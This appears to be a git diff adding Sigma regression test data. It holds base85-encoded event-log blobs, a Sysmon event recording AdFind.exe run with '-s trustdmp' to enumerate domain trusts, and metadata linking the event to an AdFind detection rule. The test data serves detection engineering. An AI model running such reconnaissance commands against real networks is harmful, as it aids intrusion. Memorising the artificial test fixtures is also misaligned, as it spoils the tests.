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 Uw*C^PKbLv3g25*iv51BC|H$BW7XSbN literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json new file mode 100644 index 000000000..ab8d77e62 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T11:32:08.872401Z" + } + }, + "EventRecordID": 651803, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 11:32:08.871", + "ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02", + "ProcessId": 8080, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -s trustdmp", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02", + "ParentProcessId": 1648, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml new file mode 100644 index 000000000..69f9d343d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml @@ -0,0 +1,13 @@ +id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + title: PUA - AdFind Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0996d98ff175f3870e44323df39a027bcedba806 GIT binary patch literal 69632 zcmeI536vdGnaA&Yy`-~r78XTCY@#4wI_WH(1&q+?#Y7W`>;L<1XWxZgJNkNE@n6;-*sJfXt8s3Arntz2f43d@^J^x2lk^5@ z52QVi_CVSLX%D15koG{@18EPWJ&^W5+5>41q&+Zd4|Mij*uK605*M`lr0>1lNk)P9 z9O~Rf8@}|hQExm-0qXg{cV6N~;0Y(_oi1?0?|;uvK0dp)+mj~qU);V>q(_QL%UB4UB@4wepf3ZLLxp{T&a<|j<>ExhJ z)MZ-Tb`=|P1MWn(M4v%-fsXX5%vS9$*7pt_+3j}e*DiOVN-oy#T{^zRU8ZyW`d;Q* z^jV?37PngedxxtZEclhp96Y#R?<%~vU1!$2Gu#!r^H5Zy26)@SgXgJT;f+52rUth; zs{K;c)uU3ob#|q;t}qy1|NdHcsv5gfC!L!+*JbL@_2c3A!)x7Z-Ja-5oto$7)wI>P zO)7S!FY)Bo8F`(x!FA}|E49@#KuD&)i z+bz_AFw&2hIm4api|tTP_3K=A?rc|Et2uX+euN?3b6=g?sDiw!zNnC+P}Uu(A4mFe z+WDqhcV_f1E{Td{sW9W3^n)qD-_1wWyVLXnc`bAi)n&L-oqL6Tgqd^k{SEH*I(>!S z+b;EEkNTaWb?)$5b^B)h*yrzf(z|D?(j8HswyS8b8o(>+QJJWFm_>}KSHEdi!5a)0 zse9_(f||@Mjg}lO>8feW>+REZLz+xWtmm_HXSrFlojNdfK74>1fNW2WR>*dw~iL>f>9{;2P>7t-RW|uW3*ZZ})v0 zI$-Wh*HDw09}OpnF@JxjA=<8zTQ!jSqjvMs=DSR7#$Fm!jTd)Pe?!z!J2ez&oXwSN zUFHR9!ftg*v!>@#Kc#!zMYkd&-4aaEH=oJ&QCu?wry9OuHr@vb5u{F3^Q8`^6 z9dFUE`EH(DukR1fK03Nf;E--_pp~_AoLjF8Ha$8sx~fhSgugnf-lR4c60l}>j*j)~ z*>`Cw460v@2<_DGez#@yz&R&;@yG4AZ>)cE$3Oo0dt<$RNi-Mf3g(QBRH%m$^tWsn zS{>L3`?D`NX-npH@4Wk&vp#XykMt5LrT6+x?ZS!q>v$`JE)evN=(byR99p?X-*9He z-qpKmMZc(&voF$C4~?wLG-$l14K1uY?zUjKBVcxzaQADu>i#VJc@E)gsC^ z`?Ariw>!@+8t8%8W*f6^9@iZ2uX#!C{-u+n$7LI9Tm$8g_T_o|zV&q)QZS>7)c$Ov zhEZZ$y42e|Wg+p+Hr9=BO^3?E@)+3z!|yBGSU*Dl7(?n&pF(W1jWb3l3*}-$GJCI3 z*#;}S%0DOl(zN zbQM{lL)Wm+Q$dz#?`*r8cg{Ftw)*zg4o~@P;~Xm$`?fdgUKd3(D>phsT4_`4=*yMg zpy$Xo&NcQFM*6FAEm)v2$~;3vu^xj?L2zx>+4b{mWG(kkK%M>x=4xc|+`VdFplmsQ zoNa{0s+BMIS00|bvR(uU@d!a_P;FdbC1cyTStUac+sFxQA=e*=Sbwzonj#i!Gi;t_ zSkm?Oe23ceCCtv;wfVE?urk}5G^P%>>v!Ia15?O0zCc&hI><~`qyZ4nXEC6;vd5tx9f~X{Hf#09h?@RTYa?Oz_y3Dm|Z>f&( zd%0_h_D_ts--!}aSL^<8!e#EAf75i>oM#Sfe_*~E=1$Je*Tb|+5bpMLjd6iw*)%*C z2ep5kB!JZtLXTIuHjU9sRiV`{VhpP}D@WA9eEtwrUwXp9cHEgC)f1FIH>ItEs$FUC~pSOb5?z@)Fj7Y8qQh7fy-(s#GgB>1}pMg=iB8 z?GX3u6vgS*yS+@kM8C0_WY(i2o1^jc@V*1v=UvmqfO6p*?Q2ssK6Z%W?$myV-t1bp zPNQ>$-tAJohd+bZpM={|hcY3qva#e7+SBMnTGOibY|yi9j@m@ac*0dWN2|HlQthu)$yF-LQ?J%NmZ}Ub z;9jk&r$fIxRjys%Em4m?^Ynr3U-vWgMu~bhLj!FYjNZsOy0Tq0w!63Jj?BveeS$dD zEq=HwnrVGH2iJfncdPbp%|j%>F4etWZ9iQzV91{>o=aPzxxJ-mZg0_DN@r`hOBk8c zrL|2`*w0XJF*+AYeY7#in_8sjM9E(sy{Fdb2=9~8vPy4tQS5t3nkn6SH%Q<8l5=)N zG>7*%u^utn=21=8Mu|htcR+tY>02x@h$6(&)R@kG^}32&2z9c^rR$J`Cuo z_UPFzk&M)@5r*)-TjR{6I%F&Q1?`LD-EN!8^y_;t@5*MKK{7F|Bya|&w!s$`tLI&$ z$09FcKtWz>@}<$zsKpiBvB}R0EE#Z}pq;pa7Q?~dW+?9Ev?q-4XRAjry%WD zD$sJMA@p;l-Vju_O>YP)wmPD#P;n^UGX3rpwSf*ov7phd5%nvkbe$u5g9O=@2yXu3BaK}!SHBQi`mO+c*5PaLrZqs?F zaw#pRH1vL@uHf0A&uu!kBDxl?!jsc(_y=w3(tSEqo@Ye3Mc%qiz1m4PO5WN(JG{Hf zkDeZlXrmBLlx;LAZ?a}_uGWPbcV;5NIEA!W{%C|MwYbFtGMr#9{%)Of-}sf;I_~?y z7jCI3u@}eLTo6Kn%>{af@XR)n&E@scZ*Qpa;P)O}dz}t_%AW{Un9#E9 zRJ6j($sF;|GjF~E>xll?f8e$EZvOPeA33V;l{dcZQ+i5of%&L*7fBt!%7Q+2ruNIT zsh|Z@y1?diwaLk z*#xTtwv<}OG{Crch_;|BGOVxE?<+L~kI?rrZ79gt2Zp3o!iV>0-{}l8cCo(LB8nAB z1o{vCMIt~xH44`J=9@Y($_Zi%g*RtybJ6i-NQB> z>p3KbeznwOZglMCsPEtx{6gP=yPzc?;V;wCH97+Kw$jEqZ_kWb|N>=)vut9=xp#4I!lmDLqKi zi=hX7(1Ab?zUAq`=3n1gWqJ^5Ori&&Whp&~Slig)~1<@CNd`5@GoL=QsCp6B!ci~C~9w|Jh69=ure;CfFFR!H+s 